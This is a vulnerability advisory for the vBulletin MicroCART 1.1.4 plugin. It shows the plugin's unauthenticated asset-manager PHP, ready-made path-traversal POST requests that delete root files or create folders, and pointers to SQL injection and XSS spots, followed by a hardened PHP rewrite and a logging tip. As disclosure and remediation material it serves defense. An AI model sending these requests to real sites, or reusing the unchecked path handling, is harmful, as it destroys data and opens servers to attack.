# Exploit Title: vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion, SQL Injection & XSS
# Date: January 8, 2015
# Exploit Author: Technidev (https://technidev.com)
# Vendor Homepage: https://vbulletin.com
# Software Link: http://www.vbulletin.org/forum/showthread.php?t=256723
# Version: 1.1.4

This plugin is fairly old but still used by a lot of people; it received its last update nearly 4 years ago. It is vulnerable to arbitrary file deletion and SQL injection.

*Arbitrary File(s) Deletion*

In /microcart/editor/assetmanager/ there are a number of files which are presumably meant to let the administrator manage files and folders. Unfortunately, no authentication or input checks were added to verify that the user should have access to them, or that the request does not contain anything malicious.

The /microcart/editor/assetmanager/folderdel_.php file contains the following at the top:

    $sMsg = "";
    if(isset($_POST["inpCurrFolder"]))
    {
        $sDestination = pathinfo($_POST["inpCurrFolder"]);

        //DELETE ALL FILES IF FOLDER NOT EMPTY
        $dir = $_POST["inpCurrFolder"];   // taken straight from the request, no validation
        $handle = opendir($dir);
        while($file = readdir($handle))
            if($file != "." && $file != "..")
                unlink($dir . "/" . $file);
        closedir($handle);

        if(rmdir($_POST["inpCurrFolder"])==0)
            $sMsg = "";
        else
            $sMsg = "";
    }

By simply sending a POST request to this file, we can delete every single file in the specified folder.

POST to: /microcart/editor/assetmanager/folderdel_.php
POST data:
    inpCurrFolder: ../../../

This POST request will delete every single .php file in the root folder of vBulletin.

*Arbitrary File Deletion*

There is another vulnerability, which resides in the /microcart/editor/assetmanager/assetmanager.php file. It contains an upload function, which is safe, and a file deletion function, which is not. We can delete any file off the server by abusing this. Unlike the previous vulnerability, which deletes all files in a folder given by a POST value, this one deletes a single file off the server.

Vulnerable code:

    if(isset($_POST["inpFileToDelete"]))
    {
        $filename=pathinfo($_POST["inpFileToDelete"]);
        $filename=$filename['basename'];
        if($filename!="")
            unlink($currFolder . "/" . $filename);   // $currFolder comes from inpCurrFolder, unchecked
        $sMsg = "";
    }

Exploited by sending the following request:

POST to: /microcart/editor/assetmanager/assetmanager.php
POST data:
    inpCurrFolder: ../../../
    inpFileToDelete: index.php

This will delete the /index.php file of vBulletin, in the root.

*Arbitrary Folder Creation*

Besides the file deletion, there is a file called /microcart/editor/assetmanager/foldernew.php which creates a folder with mode 0755 on the server. The file contains the following at the top:

    $sMsg = "";
    if(isset($_POST["inpNewFolderName"]))
    {
        $sFolder = $_POST["inpCurrFolder"]."/".$_POST["inpNewFolderName"];
        if(is_dir($sFolder)==1)
        {//folder already exist
            $sMsg = "";
        }
        else
        {
            //if(mkdir($sFolder))
            if(mkdir($sFolder,0755))
                $sMsg = "";
            else
                $sMsg = "";
        }
    }

By sending the following POST request, we will create a folder with 0755 permissions.

POST to: /microcart/editor/assetmanager/foldernew.php
POST data:
    inpNewFolderName: davewashere
    inpCurrFolder: ../../..

This POST request will create the folder davewashere in the root of the vBulletin forum.

*SQL Injection*

MicroCART is also vulnerable to SQL injection at several locations, although most of them are rather hard to abuse. I will not explain how to exploit it, but the vulnerability can be found at /cart.php lines 833 to 881, and in the function that adds products to your shopping cart, at around lines 1251 to 1328, where $_POST['fields'] is assigned to the configuration variable which is later used in a query.

*Cross Site Scripting*

When modifying your information at /cart.php?do=cpanel, you can inject anything you want into the fields. Viewing reviews of products may be vulnerable as well when you leave out the wysiwyg POST key.
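All three asset-manager issues above share one root cause: a request parameter is used as a filesystem path with no authentication check and no confinement to the directory the asset manager is supposed to manage. The following is an added example of how the three handlers could be hardened; it is not MicroCART's or vBulletin's code. It assumes a single base directory ($assetBase) that the asset manager may touch, and uses a hypothetical user_is_asset_admin() hook standing in for the forum's real permission check. Paths are normalised lexically (so new folders that do not exist yet can be checked too), parent traversal is refused outright, and existing targets are re-checked with realpath() so symlinks inside the base cannot redirect a delete outside it.

```php
<?php
// Added example, not the plugin's code: confine asset-manager operations to one base directory.

function user_is_asset_admin(): bool
{
    // Hypothetical hook: replace with the forum's own administrator permission check.
    return !empty($_SESSION['asset_admin']);
}

// Turn a user-supplied relative folder path into an absolute path under $base,
// or return null if it contains traversal or unexpected characters.
function resolve_inside(string $base, string $userPath): ?string
{
    $baseReal = realpath($base);
    if ($baseReal === false || str_contains($userPath, "\0")) {
        return null;
    }
    $parts = [];
    foreach (explode('/', str_replace('\\', '/', $userPath)) as $seg) {
        if ($seg === '' || $seg === '.') continue;
        if ($seg === '..') return null;                       // no parent traversal at all
        if (!preg_match('/^[A-Za-z0-9._-]+$/', $seg)) return null;
        $parts[] = $seg;
    }
    return $baseReal . ($parts ? '/' . implode('/', $parts) : '');
}

// For paths that already exist: confirm the resolved location is still under the base.
function is_within(string $baseReal, string $candidate): bool
{
    $real = realpath($candidate);
    return $real !== false && ($real === $baseReal || str_starts_with($real, $baseReal . '/'));
}

function valid_name(string $name): bool
{
    return $name !== '.' && $name !== '..' && preg_match('/^[A-Za-z0-9._-]+$/', $name) === 1;
}

// Counterpart of folderdel_.php: delete the regular files in one folder, then the folder itself.
function asset_delete_folder(string $base, string $folder): bool
{
    if (!user_is_asset_admin()) return false;
    $baseReal = realpath($base);
    $target = resolve_inside($base, $folder);
    if ($target === null || $target === $baseReal || !is_dir($target) || !is_within($baseReal, $target)) {
        return false;                                           // never the base itself, never outside it
    }
    foreach (scandir($target) as $entry) {
        if ($entry === '.' || $entry === '..') continue;
        $p = $target . '/' . $entry;
        if (!is_link($p) && is_file($p)) unlink($p);            // no recursion, no following links
    }
    return rmdir($target);
}

// Counterpart of assetmanager.php's delete branch: remove one named file inside a confined folder.
function asset_delete_file(string $base, string $folder, string $file): bool
{
    if (!user_is_asset_admin()) return false;
    $dir = resolve_inside($base, $folder);
    $name = basename($file);
    if ($dir === null || !valid_name($name)) return false;
    $target = $dir . '/' . $name;
    if (is_link($target) || !is_file($target) || !is_within(realpath($base), $target)) return false;
    return unlink($target);
}

// Counterpart of foldernew.php: create a folder only inside an existing, confined parent.
function asset_create_folder(string $base, string $folder, string $newName): bool
{
    if (!user_is_asset_admin()) return false;
    $dir = resolve_inside($base, $folder);
    if ($dir === null || !is_dir($dir) || !is_within(realpath($base), $dir) || !valid_name($newName)) {
        return false;
    }
    $target = $dir . '/' . $newName;
    return !is_dir($target) && mkdir($target, 0755);
}

// Assumed request wiring (the plugin's real entry points are the files named in the advisory).
$assetBase = __DIR__ . '/assets';
if (isset($_POST['inpCurrFolder'], $_POST['inpFileToDelete'])) {
    asset_delete_file($assetBase, $_POST['inpCurrFolder'], $_POST['inpFileToDelete']);
}
```

With this in place, the requests shown in the advisory (inpCurrFolder set to ../../../) are rejected at resolve_inside() before any filesystem call is made, and an unauthenticated client never reaches that point at all. Requests carrying inpCurrFolder values with ../ segments against these three scripts are also a cheap thing to alert on in web server logs while the plugin remains installed.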